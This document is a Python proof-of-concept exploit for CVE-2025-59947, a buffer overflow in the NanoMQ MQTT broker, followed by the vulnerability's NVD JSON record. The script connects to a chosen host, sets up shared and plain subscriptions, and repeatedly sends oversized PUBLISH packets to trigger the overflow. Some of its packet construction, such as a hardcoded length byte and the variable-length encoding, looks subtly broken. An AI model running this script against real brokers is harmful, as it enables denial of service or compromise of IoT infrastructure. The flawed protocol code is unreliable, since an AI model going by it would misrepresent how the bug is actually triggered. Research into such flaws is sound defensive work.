CVE-2025-59947

#!/usr/bin/env python3 """ CVE-2025-59947 PoC - NanoMQ Buffer Overflow in Shared Subscription Note: This PoC is for educational and security research purposes only. """ import socket import struct import time def create_mqtt_connect_packet(client_id): """Create MQTT CONNECT packet""" protocol_name = b'MQTT' protocol_level = b'\x04' # MQTT 3.1.1 connect_flags = b'\x02' # Clean session keep_alive = struct.pack('!H', 60) payload = struct.pack('!H', len(client_id)) + client_id.encode() variable_header = protocol_name + protocol_level + connect_flags + keep_alive remaining_length = len(variable_header) + len(payload) packet = b'\x10' + bytes([remaining_length]) + variable_header + payload return packet def create_mqtt_publish_packet(topic, payload, qos=1, dup=0, retain=0): """Create MQTT PUBLISH packet targeting both shared and vanilla subscriptions""" # Shared subscription topic: $share/group1/test/topic # This topic structure can trigger both shared and vanilla subscription matching packet_type = 0x30 | (dup << 3) | (qos << 1) | retain topic_bytes = topic.encode() variable_header = struct.pack('!H', len(topic_bytes)) + topic_bytes if qos > 0: packet_id = struct.pack('!H', 1) else: packet_id = b'' remaining_length = len(variable_header) + len(packet_id) + len(payload) # Build remaining length (up to 4 bytes for variable length encoding) rl_bytes = b'' x = remaining_length while True: rl_bytes = bytes([x % 128]) + rl_bytes x = x // 128 if x == 0: break # Fix the last byte to set the continuation bit to 0 rl_bytes = rl_bytes[:-1] + bytes([rl_bytes[-1] & 0x7F]) packet = bytes([packet_type]) + rl_bytes + variable_header + packet_id + payload return packet def create_shared_subscription_packet(group_id, topic_filter): """Create MQTT SUBSCRIBE packet for shared subscription""" # SUBSCRIBE packet type = 0x82 (SUBACK response = 0x90) packet_id = struct.pack('!H', 1001) # Shared subscription topic filter: $share/{group}/{filter} shared_topic = f"$share/{group_id}/{topic_filter}" topic_bytes = shared_topic.encode() # Topic filter length + topic + QoS byte payload = struct.pack('!H', len(topic_bytes)) + topic_bytes + bytes([1]) remaining_length = len(packet_id) + len(payload) packet = b'\x82' + bytes([remaining_length]) + packet_id + payload return packet def exploit(target_host, target_port=1883): """ Exploit CVE-2025-59947 by sending specially crafted PUBLISH packets that trigger both shared and vanilla subscription matching """ print(f"[*] Targeting {target_host}:{target_port}") print(f"[*] Exploiting CVE-2025-59947: NanoMQ Buffer Overflow") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) print("[+] Connected to NanoMQ broker") # Step 1: Connect to the broker client_id = "poc_client_59947" connect_packet = create_mqtt_connect_packet(client_id) sock.send(connect_packet) print("[+] Sent CONNECT packet") # Step 2: Subscribe with shared subscription shared_sub = create_shared_subscription_packet("exploit_group", "test/#") sock.send(shared_sub) print("[+] Sent shared SUBSCRIBE packet") # Step 3: Also subscribe with vanilla subscription (same topic pattern) vanilla_sub = b'\x82\x0d\x03\xe8\x00\x09test/#\x01' sock.send(vanilla_sub) print("[+] Sent vanilla SUBSCRIBE packet") time.sleep(0.5) # Step 4: Send malicious PUBLISH packet # The topic is crafted to trigger both subscription types simultaneously # This causes buffer overflow in NanoMQ's subscription handling evil_topic = "test/payload" + "A" * 500 # Overflow payload evil_payload = b"X" * 1024 publish_packet = create_mqtt_publish_packet(evil_topic, evil_payload, qos=1) sock.send(publish_packet) print("[+] Sent malicious PUBLISH packet - buffer overflow triggered") # Step 5: Send multiple packets to maximize exploitation for i in range(10): sock.send(publish_packet) time.sleep(0.1) print("[+] Exploitation packets sent") sock.close() print("[+] Done - Check target for potential compromise") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = "127.0.0.1" exploit(target)

{"cve": {"id": "CVE-2025-59947", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:59.157", "lastModified": "2026-01-30T21:14:03.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoMQ is a messaging broker/bus for IoT Edge & SDV. Versions prior to 0.24.4 have a buffer overflow case while the PUBLISH packets trigger both shared subscription and vanila subscription. This is fixed in version 0.24.4. As a workaround, disable shared subscription."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.24.4", "matchCriteriaId": "49D249C2-C388-4669-8801-929898E7DEAC"}]}]}], "references": [{"url": "https://github.com/nanomq/nanomq/commit/5f5581054bb92f102cf99251e8af2f43763d457b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nanomq/nanomq/issues/2110", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-98f4-cmg8-x7f3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}